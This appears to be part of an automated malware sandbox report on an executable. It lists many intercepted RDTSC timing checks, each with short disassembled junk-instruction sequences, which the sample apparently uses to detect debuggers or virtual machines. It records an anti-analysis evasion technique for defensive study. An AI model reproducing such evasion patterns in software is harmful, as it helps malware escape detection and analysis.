    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2274 second address: AA227E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA227E second address: AA2298 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB418AEFE55h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2298 second address: AA22B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007FB418E0AE76h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007FB418E0AE7Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2415 second address: AA2436 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418AEFE46h 0x00000008 jmp 00007FB418AEFE4Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FB418AEFE46h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2436 second address: AA2440 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA334A second address: AA3371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE59h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA3371 second address: AA3377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA6678 second address: AA6699 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB418AEFE59h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA9830 second address: AA9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA9837 second address: AA983C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AAE4E9 second address: AAE503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418E0AE7Eh 0x00000008 pop eax 0x00000009 jl 00007FB418E0AE7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AAE0B7 second address: AAE0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB418AEFE4Ah 0x0000000b popad 0x0000000c pop edi 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FB418AEFE46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AAE0DA second address: AAE0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9832 second address: AB9836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9972 second address: AB9982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jc 00007FB418E0AE7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9982 second address: AB998A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB998A second address: AB9994 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418E0AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9994 second address: AB99A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FB418AEFE46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC0417 second address: AC041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC041C second address: AC0424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC0424 second address: AC0468 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB418E0AE7Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007FB418E0AE78h 0x00000015 jc 00007FB418E0AE7Ah 0x0000001b pushad 0x0000001c popad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jmp 00007FB418E0AE83h 0x00000024 push eax 0x00000025 push edx 0x00000026 ja 00007FB418E0AE76h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC0468 second address: AC046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC549C second address: AC54D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ch 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FB418E0AE7Eh 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jnc 00007FB418E0AE7Ch 0x00000019 jp 00007FB418E0AE76h 0x0000001f pushad 0x00000020 jp 00007FB418E0AE76h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC6C6D second address: AC6C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AD16DD second address: AD16EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418E0AE76h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AD16EB second address: AD1714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418AEFE46h 0x0000000a jp 00007FB418AEFE46h 0x00000010 jmp 00007FB418AEFE54h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AD157A second address: AD157E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADBA07 second address: ADBA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADBA0B second address: ADBA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA21E second address: ADA227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA227 second address: ADA237 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a ja 00007FB418E0AE76h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA237 second address: ADA24D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FB418AEFE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007FB418AEFE46h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA386 second address: ADA38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA38A second address: ADA38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA38E second address: ADA398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA398 second address: ADA39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA39C second address: ADA3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB418E0AE7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA3AA second address: ADA3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jp 00007FB418AEFE46h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB418AEFE51h 0x0000001c jmp 00007FB418AEFE4Ch 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA3DE second address: ADA3FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FB418E0AE86h 0x0000000e ja 00007FB418E0AE76h 0x00000014 jmp 00007FB418E0AE7Ah 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA56D second address: ADA57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jns 00007FB418AEFE46h 0x0000000c pop edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA720 second address: ADA724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA724 second address: ADA74F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FB418AEFE4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA898 second address: ADA89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADAB23 second address: ADAB41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB418AEFE51h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADAB41 second address: ADAB61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB418E0AE85h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADAB61 second address: ADAB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE0480 second address: AE04AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB418E0AE7Eh 0x0000000d jmp 00007FB418E0AE87h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE0655 second address: AE0659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE0659 second address: AE0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A37 second address: AE3A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A3D second address: AE3A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB418E0AE7Fh 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A55 second address: AE3A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A5B second address: AE3A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A61 second address: AE3A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A6A second address: AE3A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE621D second address: AE622C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE622C second address: AE623E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jnc 00007FB418E0AE76h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE623E second address: AE6250 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB418AEFE46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C027E4 second address: C027EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C027EF second address: C02811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FB418AEFE46h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02811 second address: C0281F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C014C0 second address: C014F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE53h 0x00000007 jmp 00007FB418AEFE4Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB418AEFE52h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C014F9 second address: C014FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01811 second address: C01817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01817 second address: C0181B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0181B second address: C0183B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007FB418AEFE46h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0183B second address: C0186B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FB418E0AE80h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0186B second address: C01871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01871 second address: C01875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C019F0 second address: C019FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C019FF second address: C01A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE85h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01EB3 second address: C01ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418AEFE54h 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02052 second address: C02058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02058 second address: C0205E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02322 second address: C02326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024D0 second address: C024E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB418AEFE46h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024E0 second address: C024EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418E0AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024EA second address: C024FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FB418AEFE46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024FA second address: C02532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB418E0AE82h 0x0000000c jc 00007FB418E0AE76h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007FB418E0AE82h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02532 second address: C02549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0402C second address: C0403D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0403D second address: C04041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C04041 second address: C04045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C04045 second address: C0404E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C03EC2 second address: C03ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C06E23 second address: C06E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09727 second address: C0972B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0972B second address: C09742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
